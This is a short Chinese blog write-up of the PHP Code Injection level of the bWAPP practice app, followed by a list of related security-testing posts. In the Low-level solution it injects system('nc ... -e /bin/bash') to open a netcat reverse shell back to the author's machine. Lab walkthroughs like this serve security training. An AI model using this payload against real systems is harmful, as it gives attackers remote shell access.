渗透练习工具bWAPP解法之----PHP Code Injection

曾经终败给现在 2022-05-16 07:25 100阅读 0赞

# Low: #

打开Mac的终端，输入ifconfig查看本机IP：

➜  ~ ifconfig
    lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
    	options=1203<RXCSUM,TXCSUM,TXSTATUS,SW_TIMESTAMP>
    	inet 127.0.0.1 netmask 0xff000000
    	inet6 ::1 prefixlen 128
    	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1
    	nd6 options=201<PERFORMNUD,DAD>
    gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280
    stf0: flags=0<> mtu 1280
    XHC20: flags=0<> mtu 0
    en5: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
    	options=4<VLAN_MTU>
    	ether 00:e0:4c:36:09:77
    	nd6 options=201<PERFORMNUD,DAD>
    	media: autoselect (none)
    	status: inactive
    en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
    	ether 98:01:a7:a8:05:3f
    	inet6 fe80::18e2:f23d:250:5c25%en0 prefixlen 64 secured scopeid 0x6
    	inet 10.0.3.172 netmask 0xffffff00 broadcast 10.0.3.255
    	nd6 options=201<PERFORMNUD,DAD>
    	media: autoselect
    	status: active

然后使用nc命令监听本地7890端口：

➜  nc -v -l 7890

然后直接在bWAPP的地址栏里输入[http://localhost/bWAPP/phpi.php?message=][http_localhost_bWAPP_phpi.php_message]test;system('nc 10.0.3.172 7890 -e /bin/bash')按回车，即可在Mac上拿到Shell。

# Medium and High: #

因为使用了htmlspecialchars()函数过滤，所以无解。

[http_localhost_bWAPP_phpi.php_message]: http://localhost/bWAPP/phpi.php?message=a

发表评论取消回复

表情：

评论列表（有 0 条评论，100人围观）

还没有评论，来说两句吧...

相关阅读

相关 phpinfo.php渗透

如何获取phpinfo页面phpinfo.php渗透 1.1 目录扫描phpinfo.php渗透 1|2phpinfo.php渗透:gookle hacking in

痛定思痛。/ 2023年09月23日 22:44/ 0 赞/ 51 阅读

相关渗透测试工具之：BurpSuite

Burp Suite 能高效率地与多个工具一起工作，例如：一个中心站点地图是用于汇总收集到的目标应用程序信息，并通过确定的范围来指导单个程序工作。在一个工具处理HTTP 请

心已赠人/ 2022年12月19日 00:43/ 0 赞/ 200 阅读

相关活地运用SQL Injection做数据库渗透

活地运用SQL Injection做数据库渗透文章作者：cawan 信息来源：邪恶八进制安全小组如何灵活地运用SQL Injection做数据库渗透

落日映苍穹つ/ 2022年09月20日 05:49/ 0 赞/ 2 阅读

相关渗透练习工具bWAPP解法之----OS Command Injection

low: 很简单，只需要在查询的域名后面加一个分号然后加命令即可成功执行命令。或者利用nc命令，反弹shell 清空输入框，直接输入： && nc -v

﹏ヽ暗。殇╰゛Y/ 2022年05月18日 08:28/ 0 赞/ 102 阅读

相关渗透练习工具bWAPP解法之----HTML Injection - Reflected (POST)

HTML 注入—反射型 POST 漏洞类型：注入影响范围：主站 URL：[http://localhost/bWAPP/htmli\_post.php][htt

野性酷女/ 2022年05月18日 07:24/ 0 赞/ 94 阅读

相关渗透练习工具bWAPP解法之----HTML Injection - Reflected (GET)

HTML 注入—反射型 GET 漏洞类型：注入影响范围：主站 URL：[http://localhost/bWAPP/htmli\_get.php][http_

蔚落/ 2022年05月18日 06:49/ 0 赞/ 99 阅读

相关渗透练习工具bWAPP解法之----PHP Code Injection

Low: 打开Mac的终端，输入ifconfig查看本机IP： ➜ ~ ifconfig lo0: flags=8049<UP,LOOPBACK,RU

曾经终败给现在/ 2022年05月16日 07:25/ 0 赞/ 101 阅读

相关渗透测试工具之zenmap

ZenMap是安全扫描工具NMap的一个官方的图形用户界面，是一个跨平台的开源应用，不仅初学者容易使用，同时为高级使用者提供了很多高级特性。频繁的扫描能够被存储，进行重复运

秒速五厘米/ 2022年02月26日 04:17/ 0 赞/ 1424 阅读

相关渗透测试工具之sqlmap

渗透测试是一种利用模拟黑客攻击的方式来评估计算机网络系统安全性能的方法。渗透测试工具很多，其中sqlmap 是一个开源的渗透测试工具，可以用来进行自动化的检测，利用SQL注

忘是亡心i/ 2022年02月26日 03:44/ 0 赞/ 442 阅读

相关 KaliLinux——Wordpress渗透之Wpscan工具

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

素颜马尾好姑娘i/ 2021年07月25日 20:26/ 0 赞/ 850 阅读